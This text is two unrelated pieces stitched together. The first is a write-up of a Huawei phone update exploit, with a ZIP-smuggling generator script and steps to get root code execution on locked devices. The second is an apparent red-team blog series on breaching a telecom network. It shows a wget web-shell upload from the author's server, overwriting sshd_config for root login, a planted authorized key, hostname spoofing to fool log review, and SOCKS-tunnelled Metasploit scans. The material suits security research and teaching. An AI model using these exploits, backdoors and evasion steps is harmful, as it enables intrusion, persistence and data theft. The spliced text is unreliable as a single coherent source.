We did the kernel compilation off-target, on an x86 Ubuntu 22.04 machine, so a cross-compilation environment was needed. Acquiring the kernel sources (we used commit a90c1b9c) and applying the mass storage patch:
sudo apt install git bc bison flex libssl-dev make libc6-dev libncurses5-dev
sudo apt install crossbuild-essential-arm64
mkdir linux
cd linux
git init
git remote add origin https://github.com/raspberrypi/linux
git fetch --depth 1 origin a90c1b9c7da585b818e677cbd8c0b083bed42c4d
git reset --hard FETCH_HEAD
git apply < ../mass_storage_patch.diff
For the kernel config we use the Raspberry Pi 4 specific defconfig. The default kernel configuration contains a multitude of unnecessary modules, which could have been trimmed down quite a bit.
KERNEL=kernel8
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- bcm2711_defconfig
make -j8 ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- Image modules dtbs
After building the kernel, we copy the products to the SD card:
Finally we put the SD card back into the RPi and boot it.
Crafting the Update Archive
Recall that we have three phases of the update process, separated by the mount actions: the first checks the software version for compatibility of the update with the device, the second verifies the update cryptographically, and the third applies the update. We are going to construct a “frankenZIP” update archive which can present itself differently in each of these phases, using our FaultyUSB, to achieve our goal.
It may seem logical at first that the first two steps (compatibility check, signature verification) can be served the same archive, since we just need a valid update archive that is both signed and has a matching version for the given device. However, the second phase of the update process is actually more convoluted, as it performs multiple sub-checks: in addition to the Android-specific update signature verification, there is another important part of the verification stage, the authentication token check.
The authentication token is a cryptographically signed token, infeasible to forge, but it only applies to OTA update archives; SD-type updates are not checked for auth tokens. SD updates are most likely meant to be installed locally, e.g. literally from an SD card, so no Huawei server is involved in accepting the update process and issuing an auth token.
It is possible to find an OTA update archive for a specific device, because the end user must be able to update their phone, so there must be a way to publicly access the OTA updates. Unfortunately, SD updates are more difficult to find; we only managed to find a few model-version combinations on Android file hosting sites. Analyzing update archives of different types and versions, we found that Huawei uses the so-called hotakey_v2 RSA key across a broad range of devices as the Android-specific signing key: both an SD update for LIO EMUI 11 and the latest HarmonyOS updates for NOH are signed with this key. This means that an update archive for a different model and an older OS version may still pass the cryptographic verification, even on devices with a fresh HarmonyOS version.
Also, there are some recent changes in the update archive content: the newer update archives (both OTAs and SDs) have begun to utilize the packageinfo.mbn version description file, which is also checked during the verification stage. If this file exists, a more thorough version-compatibility test is performed: e.g. when it defines an "Upgrade" field and the installed OS has a greater version number than the current update, the update process is aborted. However, the check is skipped if this file is missing, which is exactly the case with the pre-HarmonyOS updates: e.g. the EMUI 11 SD update archives don't have the packageinfo.mbn file.
Solving all those constraints, we were eventually able to find a publicly available file on a firmware sharing site (named Huawei Mate 30 Pro Lion-L29 hw eu LIO-L29 11.0.0.220(C432E7R8P4)_Firmware_EMUI11.0.0_05016HEY.zip), which contains the SD update of LIO-L29 version 11.0.0.220. There are three ZIP files in an SD update: the base, preload, and cust packages. Each of them is signed. We selected the cust package as the foundation of the PoC because of its tiny (14 KB) size.
This file is perfect for the second phase of the update (verification), but it would obviously not have the correct SOFTWARE_VER_LIST.mbn for our target devices. That's why the exploit has to present the external media differently between phases 1 and 2 as well: in the first phase we produce a variant that has the desired SOFTWARE_VER_LIST.mbn, while in the second phase we produce the previously mentioned EMUI 11 SD update archive, which passes not only the signature verification but also bypasses the authentication token and packageinfo requirements. However, this original archive is not used exactly "as-is" for phase two: we must modify it so that it still passes verification in phase two while also containing the arbitrary binary to be executed in the third phase (code execution).
Creating such a static "frankenZIP" that can produce multiple contents depending on the update stage was the main point of our previous publication; see the UnZiploc presentation on exploiting CVE-2021-40045. The key to it is the way the parsing algorithm of the Android-specific signature footer works: the implementation still enables us to create a gap between the end of the actual ZIP file and the beginning of the whole-file PKCS#7 signature. This gap is a no man's land in the sense that ZIP parsers omit it, as it is technically part of the ZIP comment field; likewise, the signature verifier also skips it, because the signature field is aligned to the end of the file. However (and this is why we needed a new vulnerability compared to the previous report), statically smuggling a ZIP file inside the gap area is no longer possible, since the fix Huawei employed, searching for the ZIP End of Central Directory marker in the archive's comment field, is an effective mitigation.
This EOCD searching happens in the verification phase, just before the Android-specific signature checking. This means that during the verification phase a pristine update archive must be used (apart from the fact that it is still possible to create a gap between the signature and the end of the ZIP data).
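The mitigation can be approximated in a few lines (this is our Python approximation of the check's effect, not Huawei's actual code): scan the comment area for a ZIP End of Central Directory magic and reject the archive if one is found. It also shows why zero-masking defeats the scan:

```python
# Our approximation (not Huawei's code) of the post-fix check: reject
# archives whose comment area contains a ZIP End of Central Directory
# record, i.e. a second, smuggled ZIP hiding in the gap.

EOCD_MAGIC = b"PK\x05\x06"

def comment_area_is_clean(comment_area: bytes) -> bool:
    return EOCD_MAGIC not in comment_area

# A statically smuggled ZIP in the gap trips the check...
smuggled = b"\x00" * 0x40 + b"PK\x03\x04...PK\x05\x06..." + b"\x00" * 0x40
# ...but the same region, read through FaultyUSB during verification, is
# all zeros, so the very same on-disk bytes pass the scan.
masked = b"\x00" * len(smuggled)
```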
Therefore, the idea is to utilize the patched mass storage functionality of the Linux kernel to hide the injected ZIP inside the update archive exactly when the update process reaches the verification phase. This is done by masking the payload area with zeros: when a read access occurs at the end of the ZIP file during the EOCD search of the verification process, the phone reads zeros in the no man's land, and therefore the new fix does not trigger an assertion. However, when the ZIP file is read in the third phase, the smuggled content is provided, and therefore (similarly to the previous vulnerability) the modified update-binary ends up being executed.
The content of the crafted ZIP file can be restricted to a minimal file set: only those files which are essential to pass the sanity (META-INF/CERT.RSA, SD_update.tag) and version (SOFTWARE_VER_LIST.mbn) checks during the update process. Supported models depend on the content of the SOFTWARE_VER_LIST.mbn file, where model codenames, geographical revision, and a minimally supported firmware version are listed. The update-binary contains the arbitrary code that will be executed.
Here is the ZIP-smuggling generator (smuggle_zip_inplace.py), which takes a legitimate signed ZIP archive as a base and injects into it the previously discussed minimal file set and a custom binary to be executed.
import argparse
import struct
import zipfile
import os

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="poc update.zip repacker")
    parser.add_argument("file", type=argparse.FileType("r+b"), help="update.zip file to be modified")
    parser.add_argument("update_binary", type=argparse.FileType("rb"), help="update binary to be injected")
    parser.add_argument("-g", "--gap", default="-1", help="gap between EOCD and signature (-1: maximum)")
    parser.add_argument("-o", "--ofs", default="-1", help="payload offset in the gap")
    args = parser.parse_args()
    gap_size = int(args.gap, 0)
    payload_ofs = int(args.ofs, 0)
    args.file.seek(0, os.SEEK_END)
    original_size = args.file.tell()
    args.file.seek(-6, os.SEEK_END)
    signature_size, magic, comment_size = struct.unpack("<HHH", args.file.read(6))
    assert magic == 0xffff
    print(f"comment size = {comment_size}")
    print(f"signature size = {signature_size}")
    # get the signature
    args.file.seek(-signature_size, os.SEEK_END)
    signature_data = args.file.read(signature_size - 6)
    # prepare the gap where the payload will be placed
    # (gap is the new comment size - signature size)
    if gap_size == -1:
        gap_size = 0xffff - signature_size
    assert gap_size + signature_size <= 0xffff
    # automatically set the payload offset to be 0x1000-byte aligned
    if payload_ofs == -1:
        payload_ofs = (comment_size - original_size) & 0xfff
    print(f"gap size = {gap_size}")
    print(f"payload offset = {payload_ofs}")
    # truncate the ZIP at the end of the signed data
    args.file.seek(-(comment_size + 2), os.SEEK_END)
    end_of_signed_data = args.file.tell()
    args.file.truncate(end_of_signed_data)
    # write the new (original ZIP's) EOCD comment size according to the updated gap size
    args.file.write(struct.pack("<H", gap_size + signature_size))
    # gap before the payload
    args.file.write(b"\x00" * payload_ofs)
    # write a marker before the injected payload
    args.file.write(b"=PAYLOAD-BEGIN=\x00")
    # generate the injected ZIP payload
    z = zipfile.ZipFile(args.file, "w", compression=zipfile.ZIP_DEFLATED)
    # ensure the CERT.RSA has a proper length, the content is irrelevant
    z.writestr("META-INF/CERT.RSA", b"A" * 1300)
    # the existence of this file makes the authentication token check be skipped for OTA
    z.writestr("skipauth_pkg.tag", b"")
    # the update binary to be executed
    z.writestr("META-INF/com/google/android/update-binary", args.update_binary.read())
    # some more files are necessary for an "SD update"
    known_version_list = [
        b"LIO-LGRP2-OVS 102.0.0.1",
        b"LIO-LGRP2-OVS 11.0.0",
        b"NOH-LGRP2-OVS 102.0.0.1",
        b"NOH-LGRP2-OVS 11.0.0",
    ]
    z.writestr("SOFTWARE_VER_LIST.mbn", b"\n".join(known_version_list) + b"\n")
    z.writestr("SD_update.tag", b"SD_PACKAGE_BASEPKG\n")
    z.close()
    # write a marker after the injected payload
    args.file.write(b"==PAYLOAD-END==\x00")
    payload_size = args.file.tell() - (end_of_signed_data + 2) - payload_ofs
    assert payload_size + payload_ofs < gap_size, f"{payload_size} + {payload_ofs} < {gap_size}"
    # gap after the payload
    args.file.write(b"\x00" * (gap_size - payload_ofs - payload_size))
    # signature
    args.file.write(signature_data)
    # footer
    args.file.write(struct.pack("<HHH", signature_size, 0xffff, gap_size + signature_size))
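To make the footer layout the script relies on concrete, here is a small self-contained toy (not part of the real tooling; the body and signature bytes are placeholders) that appends an Android-style signature footer, a ZIP comment whose last six bytes are the u16 triple <signature size, 0xffff, comment size>, and parses it back the same way the script above does:

```python
import struct

# Toy archive body plus an Android-style signature footer: the signature
# blob lives at the end of the ZIP comment, and the comment's last six
# bytes are <signature size> <0xffff magic> <comment size>, all u16 LE.
body = b"PK..toy-zip-data.."
signature_blob = b"S" * 26                    # stand-in for the PKCS#7 data
signature_size = len(signature_blob) + 6      # blob + 6-byte footer
comment_size = signature_size                 # no gap in this toy
archive = (body
           + struct.pack("<H", comment_size)  # ZIP EOCD comment length
           + signature_blob
           + struct.pack("<HHH", signature_size, 0xffff, comment_size))

# Parse it back, exactly like smuggle_zip_inplace.py does:
sig_size, magic, cmt_size = struct.unpack("<HHH", archive[-6:])
assert magic == 0xffff
```

With a gap, comment_size would grow by the gap size while signature_size stays fixed, which is precisely the slack the frankenZIP hides in.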
Regarding the actual content of the PoCs: because a mass storage device has no understanding of higher-level concepts like file systems or even files, it can only operate at the raw storage level, so the output of the PoC is in fact a raw file system image. Below is the file system image generation script, where the update_sd_base.zip archive is the cust part of the aforementioned LIO update and update-binary-poc is the ELF executable to be run. The update-binary-poc is a static aarch64 ELF file, which finally gets execve-d by the recovery, thus reaching arbitrary code execution as root. Also note that the output image (file_system.img) contains only a pure file system and has no partition table.
The file systems are tiny, just about 10 MB in size, and formatted as exFAT. To have a proper offset distance between the file system metadata (e.g. the file node descriptor) and the actual update archive, a 1 MB zero-filled dummy file is inserted first. This is only a precaution to prevent the Linux kernel from caching the beginning of the update archive when it reads the file system metadata.
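The layout idea, keeping 1 MB of dummy zeros between the file system metadata and the archive, can be sketched as a raw byte mock-up (the real image is a proper exFAT file system built with standard tools; all contents below are placeholders):

```python
# Mock-up of the PoC image layout (NOT a real exFAT file system): the
# update archive is kept at least 1 MB away from the metadata region, so
# that reading the metadata does not pull archive blocks into the page
# cache as a side effect.

FS_METADATA = b"EXFAT-METADATA".ljust(0x200, b"\x00")  # 0x200-byte stand-in
DUMMY_FILE = b"\x00" * (1 << 20)                       # 1 MB zero-filled spacer
update_archive = b"PK..update_sd_base.zip contents.."

image = FS_METADATA + DUMMY_FILE + update_archive
archive_offset = len(FS_METADATA) + len(DUMMY_FILE)
```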
The final step of the PoC build process automatically constructs a command which can be used to configure the patched mass storage device with the correct trigger and payload parameters. The trigger condition is defined as a read of the file node descriptor of the update_sd_base.zip file, because the file path of the update archive must be resolved into a file node by the file system, so the file metadata must be read before the actual file content. The trigger counter parameter is set empirically, as a constant, based on the observed number of mount events, directory listings, and file stats prior to the verification stage.
Leveraging Arbitrary Code Execution
Gaining root-level code exec is nice, and normally one would like to open a reverse shell to make use of it, but the recovery mode in which the update runs leaves us with a very restricted environment in terms of external connections. However, as we already detailed in the UnZiploc presentation last year, the recovery mode can, by design, make use of Wi-Fi to realize a "phone disaster recovery" feature, in which it downloads the OTA over the internet directly from recovery. So we could make use of the Wi-Fi chip to connect to our AP and thus make the reverse shell possible. The exact PoC code is not disclosed here; it is left as an exercise for the reader 🙂
Running the PoC
After building the PoC, the resulting file system image is transferred to the Raspberry Pi and then loaded as the backing file of the patched USB mass storage kernel module on the RPi.
Then we connect the RPi to the target phone with the USB-C cable and simply trigger the update process. This can be done in different ways, depending on the lock state of the device.
If the phone is unlocked (i.e. you are trying to root your own phone :), once the phone recognizes the USB device, a notification appears and the file explorer can list the content of our 10 MB emulated flash drive. Then the dialer can be used to access the ProjectMenu application by dialing *#*#2846579#*#* (or, in the case of a tablet, use the calculator in landscape mode and enter ()()2846579()() ), then select "4. Software Upgrade", and then "1. Memory card Upgrade".
More interestingly, if the phone credentials are not known, so the screen can't be unlocked to access the ProjectMenu application, the SD update method is still reachable via the eRecovery menu, by powering the phone on while holding the Power and Volume Up buttons.
Because the trigger counter can be in an indeterminate state after normal-mode Android has read the external media, it is very important to execute the kernel module unload and load commands again while the phone reboots! This way, the trigger counter is affected only by the update process, so it works correctly.
The update process itself should be fairly quick, as the whole archive is just a few KB, so the PoC code gets executed within a few seconds of entering recovery mode.
To close things out, here is a video capture of the exploit 🙂
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company's Network Monitoring System (NMS). Sorted out the reverse shell issue by tunneling SSH over HTTP. Went full-on ninja with SSH over HTTP. Proxied inside the network for an internal network scan. Got access to CDRs and the VLR with an SS7 application.
Hi everyone, this is my first post on Medium and I hope you guys enjoy reading it! There is a lot of information that I had to redact because of the sensitive nature of this info. (I’m apologizing in advance 😅 )
Introduction
So there I was doing a Red Team Engagement for a client a while back. I was asked to get inside the network and reach the Call Detail Records (CDRs) of the telecom network. For people who don't know what a CDR is, here's a good explanation (shamelessly copied from Wikipedia):
A call detail record (CDR) is a data record produced by a telephone exchange or other telecommunications equipment that documents the details of a telephone call or other telecommunications transaction (e.g., text message) that passes through that facility or device. The record contains various attributes of the call, such as time, duration, completion status, source number, and destination number.
Among all my engagements, this one holds a special place. Getting the initial foothold was way too easy (simple network service exploitation leading to RCE), but the issue was getting a stable shell.
In this blog post (not a tutorial), I want to share my experience on how I went from a Remote Code Execution (RCE) to proxified internal network scans in a matter of minutes.
Reconnaissance
Every ethical hacker/penetration tester/bug bounty hunter/red teamer knows the importance of reconnaissance. The phrase "give me six hours to chop down a tree and I will spend the first four sharpening the axe" fits perfectly here. The more extensive the reconnaissance, the better the odds of successful exploitation.
So for the RTE, the obvious choices for recon were: DNS enumeration, ASN & BGP lookups, some passive recon through multiple search engines, checking out source code repositories such as GitHub, BitBucket, GitLab, etc. for something juicy, and doing some OSINT on employees for spear phishing in case no RCE was found. (Trust me when I say this: fooling an employee into downloading & executing a malicious document is easy, but only if you can overcome the obstacles: AVs & email spam filters.)
There are just so many sources from where you can recon for a particular organization. In my case, I started off with the DNS enumeration itself.
Fun fact: The wordlist I used has 2.77 million unique DNS records.
Most of the bounty hunters will look for port 80 or 443 for all the sub-domains found. The thing is, sometimes it’s better to perform a full port scan just to be on the safe side. In my case, I found a sub-domain e[REDACTED]-nms.[REDACTED].com.[REDACTED] and after a full port scan, I got some interesting results.
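A full TCP connect sweep of the interesting range can be approximated in a few lines of Python (a hypothetical helper, not the tooling used in the engagement; a real scan would use nmap or similar):

```python
import socket

def tcp_port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Plain TCP connect() check for a single port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

# e.g. sweep the non-standard ports where the interesting services were hiding
interesting = [p for p in (12000, 14000, 14100) if tcp_port_open("127.0.0.1", p)]
```

The design point is simply that restricting a scan to 80/443 would have missed 14100/tcp entirely.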
The ports 12000/tcp and 14000/tcp were nothing special but 14100/tcp, let’s just say this was my lucky day!!
J-Fuggin-Boss!!
Remote Code Execution
From here on, everyone who has exploited the infamous JBoss vulnerabilities before knows how things will move forward. For newbies who don't have experience with JBoss exploitation, you can check out the following links to help you with it:
For JBoss exploitation, you can use Jexboss. There are many methods and exploitation techniques included in the tool and it also covers the Application and Servlet deserializations and Struct2. You can exploit JBoss using Metasploit as well, though I prefer Jexboss.
Continuing with the engagement, once I discovered JBoss, I quickly fired up Jexboss for the exploitation. The tool was easy to use.
As we can see from the above screenshot, the server was vulnerable. Using the JMXInvokerServlet method, I was then able to get Remote Code Execution on the server. Pretty straightforward exploitation, right?
You must be thinking: that was no advanced-level shit, so what's different about this post?
Patience guys!
Now that I had the foothold, the actual issue arose. Of course like always, once I had the RCE I tried getting a reverse shell.
and I even got a back connection!
However, the shell was not stable, and the python process was getting killed after a few seconds. I tried other reverse shell one-liner payloads, different common ports, even UDP, but the result was the same. I also tried reverse_tcp/http/https Metasploit payloads in different forms to get Meterpreter connections, but the Meterpreter shells also disconnected after a few seconds.
I have experienced some situations like these before and I always questioned what if I’m not able to get a reverse shell, how will I proceed?
Entering Bind shell connection over HTTP tunnel!
How I hacked into a Telecom Network — Part 2 (Playing with Tunnels: TCP Tunneling)
Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, now getting issue with the reverse shell.
When I tried getting a stable reverse shell, I failed. The other idea that came to my mind was getting a bind shell (SSH over HTTP, for stability) instead of a reverse shell over HTTP (a TCP tunnel over HTTP). But what exactly am I achieving here?
TCP tunnel over HTTP (for TCP stability) + stealthy SSH connection (over the TCP tunnel created) + SOCKS tunnel (dynamic SSH tunnel) for the internal network scan using Metasploit = exploiting internal network services to exfiltrate data via these recursive tunnels.
Looks very complex? Let’s break it down into multiple steps:
First, I created a bridge between my server and the NMS server so that it could carry protocols other than just HTTP/HTTPS (>L2 for now) [TCP tunnel over HTTP].
Once the bridge (TCP tunnel over HTTP) was created, I configured SSH port forwarding from my server (2222/tcp) to the NMS server (22/tcp) so that I could connect to the NMS server via SSH over HTTP (SSH over TCP over HTTP, to be precise). Note: the SSH service on the NMS server was listening on 127.0.0.1.
I then configured the NMS SSH server to allow root login and generated an SSH key pair (copying my public key to the authorized_keys file) for access to the NMS server via SSH.
I checked the SSH connection to the NMS using the private key, and when it worked, I created a dynamic SSH tunnel (SOCKS) to proxify Metasploit over the SSH tunnel (Metasploit over SSH over TCP over HTTP, to be precise).
I want to blog it step by step on how I created the tunnels and the way I played with them.
Tunneling 101
A tunneling protocol is a communications protocol that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network (such as the Internet) through a process called encapsulation. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, it can hide the nature of the traffic that is run through a tunnel.
The tunneling protocol works by using the data portion of a packet (the payload) to carry the packets that actually provide the service. Tunneling uses a layered protocol model such as those of the OSI or TCP/IP protocol suite, but usually violates the layering when using the payload to carry a service not normally provided by the network. Typically, the delivery protocol operates at an equal or higher level in the layered model than the payload protocol.
Source: Wikipedia
So basically the idea is to use the webserver as an intermediate proxy to forward all the network packets (TCP packets) from the webserver to the internal network.
Forwarding TCP packets to the internal network through the web server using the HTTP protocol
TCP tunneling can help you in situations where you have restricted port access and filtered egress traffic. In my case, there was not much filtering however, I used this technique to get stable shell access.
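The encapsulation idea is easy to demonstrate: the raw TCP payload bytes ride inside HTTP request bodies, and each end strips the HTTP layer before forwarding them on. A toy codec (not ABPTTS's actual wire format; the host name is made up):

```python
# Toy illustration of TCP-over-HTTP encapsulation (NOT the ABPTTS wire
# format): raw TCP payload bytes are carried as an HTTP POST body, and
# the other end peels the HTTP layer off before forwarding them.

def wrap(tcp_payload: bytes, host: str = "nms.example.test") -> bytes:
    headers = (f"POST /tunnel HTTP/1.1\r\n"
               f"Host: {host}\r\n"
               f"Content-Length: {len(tcp_payload)}\r\n\r\n")
    return headers.encode() + tcp_payload

def unwrap(http_request: bytes) -> bytes:
    head, _, body = http_request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            assert len(body) == int(line.split(b":")[1])
    return body

packet = b"\x16\x03\x01..raw tcp bytes.."
assert unwrap(wrap(packet)) == packet
```

To a firewall or proxy, every tunneled segment is just another web request, which is exactly why egress filtering rarely stops it.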
I already had an RCE on the server, and with "root" privileges at that, so I quickly used this opportunity to create a JSP-based shell using ABPTTS.
A Black Path Toward The Sun (ABPTTS)
As explained in the GitHub repo,
ABPTTS uses a Python client script and a web application server page/package to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server.
Currently, only JSP/WAR and ASP.NET server-side components are supported by this tool.
So the idea was to create a JSP based shell using ABPTTS and upload it to the web server, let the tool connect with the JSP shell, and create a TCP tunnel over HTTP to create a secure shell (SSH) between my system and the server.
python abpttsfactory.py -o jexws4.jsp
When the shell got generated using ABPTTS, the tool created a configuration file to be used for creating the TCP tunnel over HTTP/HTTPS.
I then uploaded the JSP shell to the server using wget. Note: the jexws4.war shell is a package from Jexboss. When you exploit the JBoss vulnerability via Jexboss, the tool uploads its own WAR shell to the server. In my case, I just found this WAR/JSP shell (jexws4.jsp) and replaced it with the ABPTTS shell.
wget http://[MY SERVER]/jexws4.jsp -O <location of jexws4.jsp shell on NMS server>
Once the ABPTTS shell was uploaded to the server, I quickly confirmed it in Jexboss by executing a random command and checking the output. Why? Because the Jexboss shell was now overwritten by the ABPTTS shell: no matter what command I executed, the output was always the hash printed by the ABPTTS shell.
As you can see from the above screenshot, when I executed the “id” command, I got a weird hash in return that proves the ABPTTS shell was uploaded successfully!
Now that I had a TCP tunnel over HTTP configured, the next thing I wanted to do was tunnel the SSH port running on the server (22/tcp on NMS) and bind the port to my system (2222/tcp). Why? so that I could connect to NMS via SSH. Did you notice what I was trying to do here?
SSH port forwarding (not yet tunneled) via TCP tunnel over HTTP
I had yet to configure the SSH side on the NMS and on my own server for the SSH tunnel. For now, I just prepared the port forwarding mechanism so that I could reach local port 22/tcp on the NMS from my server via port 2222/tcp.
I checked my connections table to verify that the port was properly forwarded. As you can see in the screenshot below, my server's port 2222/tcp was in the LISTEN state.
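Instead of eyeballing the connections table, the check can also be scripted. A small sketch that verifies a forwarded port accepts connections (the 2222/tcp example matches the setup above; note that connecting will actually open a tunnel session, so use it sparingly):

```python
import socket

def is_listening(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Example: the locally forwarded SSH port from this setup
# is_listening("127.0.0.1", 2222)
```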
The next step was to configure SSH to connect to the NMS and start a Dynamic SSH Tunnel (SOCKS). I'll cover this in the next post:
How I hacked into a Telecom Network — Part 3 (Playing with Tunnels: Stealthy SSH & Dynamic Tunnels)
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company's Network Monitoring System (NMS). Sorted the reverse shell issue by tunneling SSH over HTTP. Went full-on ninja with SSH over HTTP. Proxied inside the network to perform an internal network scan. Got access to CDRs and the VLR with an SS7 application.
Recap: Red Team Engagement for a Telecom company. Found an interesting subdomain, did a full port scan on it, found ports 12000/tcp, 14000/tcp, and 14100/tcp, found a running instance of JBoss (lucky me!), exploited JBoss for RCE, and implemented a TCP tunnel over HTTP for shell stability.
DISCLAIMER: This post is quite lengthy, so just sit back, be patient, and enjoy the ride!
In the previous part, I covered how I configured a TCP tunnel over HTTP and SSH port forwarding to reach port 22/tcp of the NMS server from my server via port 2222/tcp. In this blog post, I'll show how I implemented dynamic SSH tunnels for further network exploitation.
Stealthy SSH Access
When you’re connected to an SSH server, the connection details are saved in a log file. To check these connection details, you can execute the ‘w’ command in *nix systems.
The command w on many Unix-like operating systems provides a quick summary of every user logged into a computer, what each user is currently doing, and what load all the activity is imposing on the computer itself. The command is a one-command combination of several other Unix programs: who, uptime, and ps -a. Source: Wikipedia
So basically, the source IP is logged, which is dangerous for a red teamer. As this was an RTE, I could not take the chance of letting the admin learn my C2 location. (Don't worry, the ABPTTS shell was connected from my server, and I had already bought a domain for IDN homograph attacks to reduce my chances of detection.)
For the stealthy connection to work, I checked the hosts file to gather more information and I found that this server is being used quite heavily inside the network.
Such a server was already being monitored, so I thought about ways to stay as stealthy as possible in this scenario. The NMS was monitoring the network, so I figured it must also be monitoring itself, including all network connections to/from the server. This meant I couldn't run a normal port scan through the TCP tunnel over HTTP.
How about encrypting the communication between my server and the NMS server using SSH? But with an SSH connection, my hostname/IP would be stored in the log files, and the username would be easy to identify.
In this case, my server's username was 'harry', and generating a key for this user to store in the authorized_keys file was not a good option.
And then I came up with an idea (in steps):
Create the user ‘nms’ (this user was already created in the NMS server) on my server.
Change my server’s hostname from OPENVPN to [REDACTED]_NMS[REDACTED]. (the same as the NMS server)
Generate SSH keys for ‘nms’ user on my server and copy the public key in the NMS server. (authorized_keys)
Configure the SSH server running on the NMS to enable root login (PermitRootLogin), TCP port forwarding, and gateway ports. (The SSH -g switch, just in case.)
Configure the NMS server to act as a SOCKS proxy for my further network exploitation. (Dynamic SSH Tunnel)
The SOCKS tunnel is encrypted now and I can use this tunnel to do an internal network scan using Metasploit.
Implementation time!
I began by first adding the user ‘nms’ on my server so that I could generate the user-specific SSH keys.
I even changed my server's hostname to exactly match the NMS server's, so that when I logged in over SSH, the logs would show a login entry as nms@[REDACTED]_NMS[REDACTED]
Next, I generated the SSH Keys for ‘nms’ user on my server.
I also had to change the SSH configuration on the NMS server, so I downloaded the sshd_config file from the server and changed a few things inside.
AllowTCPForwarding: This option is used to enable TCP port forwarding via SSH.
GatewayPorts: This option allows remotely forwarded ports to bind to interfaces other than loopback. (I enabled it just in case I wanted a reverse shell from other internal systems to land on this server and be forwarded to me via remote port forwarding.)
PermitRootLogin: This option permits the client to connect to the SSH server using ‘root’.
StrictModes: This option specifies whether sshd should check the permissions and ownership of the user's home directory and key files before accepting a login.
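Put together, the four options above would look roughly like this in sshd_config (a sketch, using the canonical option spellings; StrictModes is relaxed here only because the key material was staged by hand):

```
PermitRootLogin yes
AllowTcpForwarding yes
GatewayPorts yes
StrictModes no
```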
Now that the configuration was done, I quickly uploaded (more like overwrote) the sshd_config file on the NMS server.
I also copied the SSH public key into the 'root' user's authorized_keys file.
After everything was set, I tried a test connection just to check whether I could SSH into the NMS server as 'root'.
Booyah! 😎😎😎
SSH over TCP over HTTP (SSH port forward over TCP Tunnel created over HTTP connection via ABPTTS shell (JSP))
Dynamic port forwarding (DPF) is an on-demand method of traversing a firewall or NAT through the use of firewall pinholes. The goal is to enable clients to connect securely to a trusted server that acts as an intermediary for the purpose of sending/receiving data to one or many destination servers.
DPF can be implemented by setting up a local application, such as SSH, as a SOCKS proxy server, which can be used to process data transmissions through the network or over the Internet.
Once the connection is established, DPF can be used to provide additional security for a user connected to an untrusted network. Since data must pass through the secure tunnel to another server before being forwarded to its original destination, the user is protected from packet sniffing that may occur on the LAN.
So all I had to do was create a Dynamic SSH Tunnel so that the NMS server would act as a SOCKS proxy server. Some of the benefits I had for using a SOCKS tunnel:
Got indirect access to other network devices/servers through the NMS server (NMS server becomes the gateway for me)
Because of the Dynamic SSH Tunnel, all the traffic from my server to the NMS server was encrypted (it used an SSH connection, remember?)
Even if a server admin sat on the NMS server and monitored the network, he wouldn't be able to find the root cause right away. (A dedicated one would eventually join the dots.)
The connection was stable (thanks to HTTP keep-alive): all these recursive tunnels ran smoothly without any connection drops because of the TCP tunnel I had implemented over HTTP.
When I logged in to the NMS server over SSH, here’s what the ‘w’ command showed me:
Now all I had to do was create the SOCKS tunnel, which I did using the command: ssh -NfCq -D 9090 -i <private key/identity file> <user@host> -p <ssh custom port>
The ‘PermitRootLogin’ was changed in sshd_config file for this purpose (to log in to the NMS server as root).
Worried about what the server admin would think of this setup? When SSH connections are opened, the admin sometimes checks the username that logged in and the authorized keys that were used, but most of the time he checks the hostname/IP the connection was initiated from.
In my case, I initiated the connection from my server, where the source address was 127.0.0.1, using port 2222/tcp (thanks to the TCP tunnel over HTTP), to the NMS server with destination address 127.0.0.1 (again!). Because of this setup, all the admin would see is a connection initiated by the NMS server to the NMS server's SSH, authenticated with the public key stored for user 'nms' (which is exactly why I created the same user on my host to generate the keys). And even if the admin checked the logs, all he would see is user 'nms@[REDACTED]_NMS[REDACTED]' connected over SSH from IP 127.0.0.1, which was already a user profile on the NMS server.
To confirm the SOCKS tunnel, I checked the connection table on my server and port 9090/tcp was in the LISTEN state.
Awesome! The SOCKS Tunnel is ready!
All that was left for me was to use the SOCKS tunnel for Metasploit for further network exploitation which I’ll cover in the next post (the final part):
Pro Tip!
When you connect to a server over SSH, a pseudo-TTY is allocated automatically. Of course, this doesn't happen when you're executing one-liner commands via SSH. So whenever you want to tunnel through SSH or create a SOCKS tunnel, try the -T switch to disable pseudo-TTY allocation. You can also use the commands below:
ssh -NTfCq -L <local port forwarding> <user@host>
ssh -NTfCq -D <Dynamic port forwarding> <user@host>
To see all the SSH switches, refer to the SSH manual (HIGHLY RECOMMENDED!). With the switches shown above, you can create a tunnel without a TTY allocation, and the tunneled port will work just fine!
How I hacked into a Telecom Network — Part 4 (Getting Access to CDRs, SS7 applications & VLRs)
In the previous part (Playing with Tunnels: Stealthy SSH & Dynamic SSH Tunnels), I covered the steps I followed to create SSH tunnels with stealthy SSH access from my server via port 2222/tcp. In this blog post, I'll show how I used the SOCKS tunnel for internal network reconnaissance and to exploit internal servers to get access to the CDRs stored on a server.
Situational Awareness (Internal Network)
During the engagement, I was able to create a Dynamic SSH tunnel via TCP tunnel over HTTP, and believe me when I say this, the shell was neat!
Moving forward, I configured the SOCKS tunnel over port 9090/tcp and then used proxychains for Nmap scans.
Though I prefer Metasploit over Nmap here, as it gave me more coverage over the scans and let me manage the internal IP scans easily. To use the proxy for all modules, I ran the "setg Proxies socks4:127.0.0.1:9090" command (setting the Proxies option globally). I was looking for internal web servers, so I used the auxiliary/scanner/http/http_version module.
Because of setg, the Proxies option was already set; all I needed to do was give the IP subnet range and run the module.
I found some Remote Management Controllers (iRMC), some SAN switches (switchExplorer.html), and a JBoss Instance …
